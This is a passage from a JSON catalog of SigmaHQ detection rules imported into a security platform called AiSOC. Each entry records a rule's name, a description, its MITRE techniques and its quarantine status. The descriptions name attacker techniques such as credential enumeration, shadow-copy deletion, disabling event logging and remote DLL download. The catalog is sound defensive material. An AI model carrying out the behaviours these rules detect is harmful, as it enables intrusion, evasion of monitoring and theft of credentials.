"df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_curl_custom_user_agent.yml" } }, { "id": "sigmahq-sigma-85de3a19-b675-4a51-bfc6-b11a5186c971", "type": "detection", "name": "Potential Discovery Activity Using Find - MacOS", "description": "Detects usage of \"find\" binary in a suspicious manner to perform 
discovery", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-discovery-activity-using-find-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "85de3a19-b675-4a51-bfc6-b11a5186c971", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_susp_find_execution.yml" } }, { "id": "sigmahq-sigma-85f520e7-6f5e-43ca-874c-222e5bf9c0de", "type": "detection", "name": "Devcon Execution Disabling VMware VMCI Device", "description": "Detects execution of devcon.exe with commands that disable the VMware Virtual Machine Communication Interface (VMCI) device.\nThis can be legitimate during VMware Tools troubleshooting or driver conflicts, but may also indicate malware attempting to hijack communication with the hardware via the VMCI device.\nThis has been used to facilitate VMware ESXi vulnerability exploits to escape VMs and execute code on the ESXi host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/devcon-execution-disabling-vmware-vmci-device.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"85f520e7-6f5e-43ca-874c-222e5bf9c0de", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_devcon_disable_vmci_driver.yml" } }, { "id": "sigmahq-sigma-85ff530b-261d-48c6-a441-facaa2e81e48", "type": "detection", "name": "New Service Creation Using Sc.EXE", "description": "Detects the creation of a new service using the \"sc.exe\" utility.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-service-creation-using-sc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "85ff530b-261d-48c6-a441-facaa2e81e48", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sc_create_service.yml" } }, { "id": "sigmahq-sigma-86157017-c2b1-4d4a-8c33-93b8e67e4af4", "type": "detection", "name": "Potential Suspicious Change To Sensitive/Critical Files", "description": "Detects changes of sensitive and critical files. 
Monitors files that you don't expect to change without planning on a Linux system.\nThese files include, but are not limited to, system configuration files, authentication files, and critical application files.\nAttackers often target these files to maintain persistence, escalate privileges, or disrupt system operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1565.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-suspicious-change-to-sensitive-critical-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "86157017-c2b1-4d4a-8c33-93b8e67e4af4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_sensitive_file_access.yml" } }, { "id": "sigmahq-sigma-8622c92d-c00e-463c-b09d-fd06166f6794", "type": "detection", "name": "Github High Risk Configuration Disabled", "description": "Detects when a user disables a critical security feature for a GitHub organization (sourced from the GitHub audit log).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-high-risk-configuration-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8622c92d-c00e-463c-b09d-fd06166f6794", "source_commit": "df5c6a6", 
"license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_disable_high_risk_configuration.yml" } }, { "id": "sigmahq-sigma-863218bd-c7d0-4c52-80cd-0a96c09f54af", "type": "detection", "name": "Arbitrary File Download Via IMEWDBLD.EXE", "description": "Detects usage of \"IMEWDBLD.exe\" to download arbitrary files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/arbitrary-file-download-via-imewdbld-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "863218bd-c7d0-4c52-80cd-0a96c09f54af", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_imewbdld_download.yml" } }, { "id": "sigmahq-sigma-86588b36-c6d3-465f-9cee-8f9093e07798", "type": "detection", "name": "Scheduled Task Executing Payload from Registry", "description": "Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scheduled-task-executing-payload-from-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable 
by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "86588b36-c6d3-465f-9cee-8f9093e07798", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml" } }, { "id": "sigmahq-sigma-867356ee-9352-41c9-a8f2-1be690d78216", "type": "detection", "name": "Potentially Suspicious Regsvr32 HTTP/FTP Pattern", "description": "Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-regsvr32-http-ftp-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "867356ee-9352-41c9-a8f2-1be690d78216", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml" } }, { "id": "sigmahq-sigma-869b9ca7-9ea2-4a5a-8325-e80e62f75445", "type": "detection", "name": "Suspicious Child Process Of SQL Server", "description": "Detects suspicious child processes of the SQLServer process. 
This could indicate potential RCE or SQL Injection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003", "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-child-process-of-sql-server.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mssql_susp_child_process.yml" } }, { "id": "sigmahq-sigma-86b896ba-ffa1-4fea-83e3-ee28a4c915c7", "type": "detection", "name": "Invoke-Obfuscation Via Stdin - Powershell", "description": "Detects Obfuscated Powershell via Stdin in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-stdin-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml" } }, { "id": "sigmahq-sigma-871b9555-69ca-4993-99d3-35a59f9f3599", "type": 
"detection", "name": "Suspicious UltraVNC Execution", "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-ultravnc-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "871b9555-69ca-4993-99d3-35a59f9f3599", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ultravnc_susp_execution.yml" } }, { "id": "sigmahq-sigma-87261fb2-69d0-42fe-b9de-88c6b5f65a43", "type": "detection", "name": "Atera Agent Installation", "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/atera-agent-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/msiinstaller/win_software_atera_rmm_agent_install.yml" } }, { "id": "sigmahq-sigma-8737b7f6-8df3-4bb7-b1da-06019b99b687", "type": "detection", "name": "Shell Invocation Via Ssh - Linux", "description": "Detects the use of the \"ssh\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell-invocation-via-ssh-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8737b7f6-8df3-4bb7-b1da-06019b99b687", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_ssh_shell_execution.yml" } }, { "id": "sigmahq-sigma-87911521-7098-470b-a459-9a57fc80bdfd", "type": "detection", "name": "Sysmon Configuration Update", "description": "Detects updates to Sysmon's configuration. 
Attackers might update or replace the Sysmon configuration with a bare-bones one to avoid monitoring without shutting down the service completely", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysmon-configuration-update.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "87911521-7098-470b-a459-9a57fc80bdfd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml" } }, { "id": "sigmahq-sigma-87a476dc-0079-4583-a985-dee7a20a03de", "type": "detection", "name": "Enumeration for 3rd Party Creds From CLI", "description": "Detects processes that query, via the command line, known 3rd-party registry keys that hold credentials", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/enumeration-for-3rd-party-creds-from-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "87a476dc-0079-4583-a985-dee7a20a03de", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml" } }, { "id": "sigmahq-sigma-87cc6698-3e07-4ba2-9b43-a85a73e151e2", "type": "detection", "name": "Bitbucket User Permissions Export Attempt", "description": "Detects user permission data export attempt.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1213", "T1082", "T1591.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-user-permissions-export-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "87cc6698-3e07-4ba2-9b43-a85a73e151e2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_user_permissions_export_attempt_detected.yml" } }, { "id": "sigmahq-sigma-87df9ee1-5416-453a-8a08-e8d4a51e9ce1", "type": "detection", "name": "Delete Volume Shadow Copies Via WMI With PowerShell", "description": "Shadow Copies deletion using operating systems utilities via PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/delete-volume-shadow-copies-via-wmi-with-powershell.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 
"2026-05-04", "upstream_path": "rules/windows/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml" } }, { "id": "sigmahq-sigma-87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", "type": "detection", "name": "Change PowerShell Policies to an Insecure Level", "description": "Detects changing the PowerShell script execution policy to a potentially insecure level using the \"-ExecutionPolicy\" flag.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/change-powershell-policies-to-an-insecure-level.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml" } }, { "id": "sigmahq-sigma-880973f3-9708-491c-a77b-2a35a1921158", "type": "detection", "name": "Linux Shell Pipe to Shell", "description": "Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1140" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-shell-pipe-to-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 
"provenance": { "source": "SigmaHQ/sigma", "source_id": "880973f3-9708-491c-a77b-2a35a1921158", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml" } }, { "id": "sigmahq-sigma-881b7725-47cc-4055-8000-425823344c59", "type": "detection", "name": "CodeIntegrity - Revoked Image Loaded", "description": "Detects image load events with revoked certificates by code integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/codeintegrity-revoked-image-loaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "881b7725-47cc-4055-8000-425823344c59", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/code_integrity/win_codeintegrity_revoked_image_loaded.yml" } }, { "id": "sigmahq-sigma-8823e85d-31d8-473e-b7f4-92da070f0fc6", "type": "detection", "name": "Suspicious ShellExec_RunDLL Call Via Ordinal", "description": "Detects suspicious call to the \"ShellExec_RunDLL\" exported function of SHELL32.DLL through the ordinal number to launch other commands.\nAdversary might only use the ordinal number in order to bypass existing detection that alert on usage of ShellExec_RunDLL on CommandLine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, 
"verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-shellexec-rundll-call-via-ordinal.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8823e85d-31d8-473e-b7f4-92da070f0fc6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_susp_shellexec_ordinal_execution.yml" } }, { "id": "sigmahq-sigma-882e858a-3233-4ba8-855e-2f3d3575803d", "type": "detection", "name": "DNS Query Request By QuickAssist.EXE", "description": "Detects DNS queries initiated by \"QuickAssist.exe\" to Microsoft Quick Assist primary endpoint that is used to establish a session.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1210" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-request-by-quickassist-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "882e858a-3233-4ba8-855e-2f3d3575803d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_quickassist.yml" } }, { "id": "sigmahq-sigma-882fbe50-d8d7-4e29-ae80-0648a8556866", "type": "detection", "name": "Crash Dump Created By Operating System", "description": "Detects \"BugCheck\" errors indicating the system rebooted due to a crash, capturing the bugcheck code, dump file 
path, and report ID.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.002", "T1005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/crash-dump-created-by-operating-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "882fbe50-d8d7-4e29-ae80-0648a8556866", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/microsoft_windows_wer_systemerrorreporting/win_system_crash_dump_created.yml" } }, { "id": "sigmahq-sigma-8834e2f7-6b4b-4f09-8906-d2276470ee23", "type": "detection", "name": "PsExec/PAExec Escalation to LOCAL SYSTEM", "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1587.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/psexec-paexec-escalation-to-local-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" } }, { "id": 
"sigmahq-sigma-883835a7-df45-43e4-bf1d-4268768afda4", "type": "detection", "name": "Regedit as Trusted Installer", "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/regedit-as-trusted-installer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "883835a7-df45-43e4-bf1d-4268768afda4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regedit_trustedinstaller.yml" } }, { "id": "sigmahq-sigma-8839e550-52d7-4958-9f2f-e13c1e736838", "type": "detection", "name": "Security Event Logging Disabled via MiniNt Registry Key - Registry Set", "description": "Detects the addition of the 'MiniNt' key to the registry. Upon a reboot, Windows Event Log service will stop writing events.\nWindows Event Log is a service that collects and stores event logs from the operating system and applications. 
It is an important component of Windows security and auditing.\nAdversary may want to disable this service to disable logging of security events which could be used to detect their activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/security-event-logging-disabled-via-minint-registry-key-registry-set.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8839e550-52d7-4958-9f2f-e13c1e736838", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_create_minint_key.yml" } }, { "id": "sigmahq-sigma-883faa95-175a-4e22-8181-e5761aeb373c", "type": "detection", "name": "Suspicious Service Binary Directory", "description": "Detects a service binary running in a suspicious directory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-service-binary-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "883faa95-175a-4e22-8181-e5761aeb373c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_susp_service_dir.yml" } }, { "id": "sigmahq-sigma-88656cec-6c3b-487c-82c0-f73ebb805503", "type": "detection", "name": "Remote Access Tool - UltraViewer Execution", "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-ultraviewer-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "88656cec-6c3b-487c-82c0-f73ebb805503", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_ultraviewer.yml" } }, { "id": "sigmahq-sigma-88872991-7445-4a22-90b2-a3adadb0e827", "type": "detection", "name": "Stop Windows Service Via Net.EXE", "description": "Detects the stopping of a Windows service via the \"net\" utility.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1489" ], 
"log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/stop-windows-service-via-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "88872991-7445-4a22-90b2-a3adadb0e827", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_net_stop_service.yml" } }, { "id": "sigmahq-sigma-889719ef-dd62-43df-86c3-768fb08dc7c0", "type": "detection", "name": "Suspicious PowerShell Mailbox Export to Share", "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-mailbox-export-to-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "889719ef-dd62-43df-86c3-768fb08dc7c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 